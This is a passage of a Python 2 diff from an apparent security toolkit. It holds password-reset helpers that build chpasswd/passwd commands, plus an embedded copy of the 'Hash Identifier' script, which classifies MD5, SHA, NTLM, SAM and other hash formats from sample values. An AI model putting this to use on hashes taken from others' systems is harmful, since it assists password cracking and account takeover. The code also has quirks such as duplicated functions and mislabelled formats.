q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + 